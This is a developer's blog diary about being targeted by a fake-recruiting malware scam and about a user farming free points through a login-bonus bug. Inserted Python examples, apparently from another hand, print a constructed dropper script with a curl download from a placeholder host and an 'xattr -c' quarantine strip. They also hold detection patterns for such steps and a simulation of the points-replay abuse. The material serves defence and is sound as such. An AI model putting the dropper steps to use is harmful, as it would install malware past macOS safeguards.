Sanvi

5 min read

Independent Development Diary 18: This Week Was Absurd: Scammers Targeted Me and Freebie Hunters Drained Me

This week has been really weird. I've been guarding against scammers and catching freebie hunters at the same time.

It went like this: someone emailed me saying they were the team behind a certain project and were looking for a front-end developer. I said I'm not a front-end developer, and they replied that they also had back-end positions and were hiring. So I added their contact and chatted for a while. We didn't talk much about technology; I briefly described my experience. At that point I didn't have many doubts (after all, the other person might not be very technical), and we arranged a voice call for the next day to go over the details of their project.

At this point I only wondered whether it was another kind of scam. I have recently run into a few teams that use recruiting as a pretext to get you to talk through technical solutions, such as how to do this and how to do that.

Then he invited a foreigner to the call (perhaps to show that it was an international team?). The foreigner could speak Mandarin, but I couldn't understand him well, so we also chatted in English. The strange thing was that they didn't talk about the details of the project at all. They just asked about the industry's prospects and opportunities and other baffling things, and then told me the team would go back and discuss it.

Then I "passed the interview" and was invited to join the team. This guy sent me a link, saying he wanted to introduce the team members. It was a link to a website called weconne, and I signed up without paying much attention at first. Because I'm in the habit of using 1Password, the password was random (so I was lucky enough to avoid leaking my email password).

Then I downloaded the software and found that, once opened, it asked you to drag it into the terminal and run it. I did so without thinking much at the time. Then I noticed something was wrong: there was no feedback after it ran, so I immediately disconnected from the network and restarted. After restarting I stayed offline and checked the domain name from another device. It turned out the .com domain was flagged as a scam. Then I looked up the site's data on AITDK and found that the site had been registered 3 days earlier. Finally I searched on Twitter and found one or two people who had already been tricked. Because I didn't go through the whole process, I don't know what would have happened next.

Then I reopened the software as text and found that it would download another program (because I had disconnected and restarted, this step could not complete). I gave the script to GPT for analysis, and GPT gave the following answer:

  • The most dangerous line: xattr -c "$TEMP_APP". It clears all extended attributes, which bypasses the Gatekeeper/notarization check, so the system no longer blocks the app as being "from an unidentified developer".

  • There is no sudo, so it gets no direct admin rights; it runs with the current user's privileges, but it may still set up user-level persistence (LaunchAgents, Login Items, crontab) or make network connections.

Next, I asked GPT how to self-check, then checked the startup items and background processes, and only reconnected to the Internet after confirming there was no problem. Then I told the scammer that my computer couldn't install it and asked them to use Zoom. They refused, saying all the team members were on that software. Then they asked me for remote assistance; I ignored them, at which point they lost their composure and said I had wasted their time.
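One way to do the two steps above, reading the installer as text before running it and then sweeping the user-level persistence locations GPT named, as an added example in Python (my code, not the author's and not the scammer's script). The installer text inside it is constructed to mimic the behaviour the post describes (fetch a second program, then xattr -c it); the URL, paths and app name are placeholders, and the pattern list is my own, not something taken from the post.

```python
"""Triage a downloaded macOS install script and sweep user-level persistence.

Added example, not the author's code and not the scammer's script. The
installer text below is constructed to mirror what the post describes (fetch a
second-stage payload, then xattr -c it); the URL and paths are placeholders.
"""
import re
import subprocess
from pathlib import Path

# Constructed sample, NOT the real script from the post.
SAMPLE_INSTALLER = """#!/bin/bash
TEMP_APP="/tmp/Installer.app"
curl -sL "https://example.invalid/payload.zip" -o /tmp/payload.zip
unzip -q /tmp/payload.zip -d /tmp
xattr -c "$TEMP_APP"
open -a "$TEMP_APP"
"""

# Each pattern is something a "team chat app" installer has no business doing.
SUSPICIOUS_PATTERNS = {
    # xattr -c / -d com.apple.quarantine strips the quarantine flag, so Gatekeeper
    # never assesses the bundle and the "unidentified developer" prompt never appears.
    "quarantine_strip": re.compile(r"\bxattr\b.*(\s-r?c\b|com\.apple\.quarantine)"),
    "download":         re.compile(r"\b(curl|wget)\b"),
    "base64_decode":    re.compile(r"\bbase64\b.*\s(-d|-D|--decode)\b"),
    "privilege":        re.compile(r"\bsudo\b|with administrator privileges"),
    "persistence":      re.compile(r"LaunchAgents|LaunchDaemons|\bcrontab\b|login item"),
    "launch_app":       re.compile(r"\bopen\s+(-a\b|\S+\.app\b)"),
}


def triage_script(text: str) -> dict[str, list[str]]:
    """Map each triggered pattern name to the stripped lines that triggered it."""
    findings: dict[str, list[str]] = {}
    for name, rx in SUSPICIOUS_PATTERNS.items():
        hits = [ln.strip() for ln in text.splitlines() if rx.search(ln)]
        if hits:
            findings[name] = hits
    return findings


def risk_level(findings: dict[str, list[str]]) -> str:
    """Download plus quarantine stripping is the classic second-stage dropper shape."""
    if "quarantine_strip" in findings and "download" in findings:
        return "high"
    if findings.keys() & {"quarantine_strip", "privilege", "persistence", "base64_decode"}:
        return "medium"
    return "low" if findings else "none"


# Where launchd persistence lands on macOS. Only the first is writable without sudo,
# which is the case that matters for a script that never asked for admin rights.
LAUNCHD_DIRS = ["~/Library/LaunchAgents", "/Library/LaunchAgents", "/Library/LaunchDaemons"]


def list_launch_plists(dirs=LAUNCHD_DIRS) -> list[str]:
    """Return the .plist files directly inside each launchd directory; skip missing dirs."""
    found: list[str] = []
    for d in dirs:
        p = Path(d).expanduser()
        if p.is_dir():
            found.extend(sorted(str(f) for f in p.glob("*.plist")))
    return found


def user_crontab() -> str:
    """Current user's crontab, or '' if there is none or crontab is unavailable."""
    try:
        out = subprocess.run(["crontab", "-l"], capture_output=True, text=True, timeout=5)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return ""
    return out.stdout


if __name__ == "__main__":
    findings = triage_script(SAMPLE_INSTALLER)
    print(f"risk: {risk_level(findings)}")
    for name, lines in findings.items():
        print(f"  {name}: {lines}")
    print("launchd plists:", list_launch_plists() or "none found")
    print("crontab:", user_crontab().strip() or "empty")
```

Run it offline on the saved installer text first; only go back online once the launchd directories and crontab show nothing you did not put there. The static check is a first filter, not proof of safety: a script that decodes or fetches its real payload can look clean on the surface, which is why the download-then-xattr shape is rated high even when nothing else matches.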

I didn't expect that even someone as cautious as me could run into this, let alone other people. On top of that, I don't know where my IG got leaked, but someone keeps trying to log in. I changed my password, turned on email verification and two-step verification, and cleared all logged-in devices, but there is still a steady stream of verification-code emails. I don't understand Meta's logic.

createio

Before I had even gotten over that, I found out that my product was being farmed for free points. Because the number of users isn't very large right now, I basically only look at the access data.

Occasionally I look at user usage in the database, and this time I noticed something interesting. One user appeared very frequently, but I remembered there had been no paying users this week, so I checked and found he was a free user who had clearly exceeded the free-user quota. My first reaction was that there was a bug. After spending dozens of dollars, I found the problem: because earlier versions of the project only allowed Google login, the bonus points for new users were granted in the login code.

This time, email login is also supported, so the logic became: check for the gift points at login. But we never stored a flag in the database recording that the gift had been given; we simply checked whether the balance was 0 and gave the points. There had been no problems before. As for this Chinese guy, I don't know how he discovered the bug, but anyway he just kept logging in again to get points and then generating videos.

I thought the matter would be over once I fixed this, but then I discovered a new problem. The email addresses of the new users were all strange: they were all on odd-looking domains, not commonly used mailbox domains. I later found out that these users were all the same person, because they used the same prompts, and then they just kept at it.

Then I chatted with GPT for a long time and found a third-party service that identifies a user's fingerprint from things like the network and UA and, with some smart judgments, produces a unique visitor ID. We now use this visitor ID to tell whether a newly registered user is the same person before deciding whether to give points. I also caught this guy's IP, which comes from Shanghai; I don't know who he is.
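The bonus logic from the two paragraphs above, the balance-is-zero check beside a hardened version that persists a per-account flag and also applies the visitor-ID check, as an added example in Python (my code, not createio's). The visitor IDs are made-up strings standing in for whatever the third-party fingerprinting service returns; the email addresses, point values, class and function names are assumptions, not anything from the post.

```python
"""The login-bonus bug and its fix, as an added example (not createio's code).

VulnerableAccounts reproduces the logic the post describes: a welcome bonus is
credited whenever the balance is 0 at login. HardenedAccounts persists a
per-account flag and also limits the bonus to one per visitor fingerprint; the
visitor_id values are made-up strings standing in for the ID a third-party
fingerprinting service would return.
"""
from dataclasses import dataclass

WELCOME_BONUS = 100  # assumed bonus size


@dataclass
class User:
    email: str
    points: int = 0
    bonus_granted: bool = False  # the column the original schema did not have


class Accounts:
    def __init__(self) -> None:
        self.users: dict[str, User] = {}

    def spend(self, email: str, cost: int) -> int:
        """Deduct points (e.g. one video generation); refuse to go negative."""
        user = self.users[email]
        if cost > user.points:
            raise ValueError("insufficient points")
        user.points -= cost
        return user.points


class VulnerableAccounts(Accounts):
    """Bonus decision keyed on balance == 0, so spend-everything-and-relogin refills it."""

    def login(self, email: str, visitor_id: str) -> int:
        user = self.users.setdefault(email, User(email))
        if user.points == 0:          # BUG: no record that the bonus was already paid
            user.points += WELCOME_BONUS
        return user.points


class HardenedAccounts(Accounts):
    """Bonus is decided once per account and paid at most once per visitor fingerprint."""

    def __init__(self) -> None:
        super().__init__()
        self.paid_visitors: set[str] = set()

    def login(self, email: str, visitor_id: str) -> int:
        user = self.users.setdefault(email, User(email))
        if user.bonus_granted:
            return user.points
        user.bonus_granted = True     # decided once, whether or not we credit
        if visitor_id in self.paid_visitors:
            return user.points        # same browser/device already collected one
        self.paid_visitors.add(visitor_id)
        user.points += WELCOME_BONUS
        return user.points


def replay_attack(accounts: Accounts, email: str, rounds: int, visitor_id: str = "fp-attacker") -> int:
    """What the post's user did: log in, burn the balance on videos, log in again."""
    total = 0
    for _ in range(rounds):
        balance = accounts.login(email, visitor_id)
        total += balance
        accounts.spend(email, balance)
    return total


def farm_accounts(accounts: Accounts, n: int, visitor_id: str) -> int:
    """The second wave: n fresh throwaway emails registered from the same fingerprint."""
    return sum(accounts.login(f"user{i}@throwaway.invalid", visitor_id) for i in range(n))


if __name__ == "__main__":
    print("vulnerable, 3 relogins:", replay_attack(VulnerableAccounts(), "a@example.invalid", 3))
    print("hardened,   3 relogins:", replay_attack(HardenedAccounts(), "a@example.invalid", 3))
    print("vulnerable, 5 accounts:", farm_accounts(VulnerableAccounts(), 5, "fp-1"))
    print("hardened,   5 accounts:", farm_accounts(HardenedAccounts(), 5, "fp-1"))
```

Two things the in-memory version glosses over. In a real database the grant should be a single conditional write (one UPDATE that sets the balance and the flag only where the flag is still false, or an insert into a bonus-grants table with a unique key per user), so two concurrent logins cannot both credit. And the fingerprint check is a heuristic: it will also block two legitimate people on a shared machine or browser profile, and a determined abuser can rotate user agents and proxies, so treat the visitor ID as one signal alongside email-domain checks and rate limiting rather than as proof of identity.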

That’s it for this week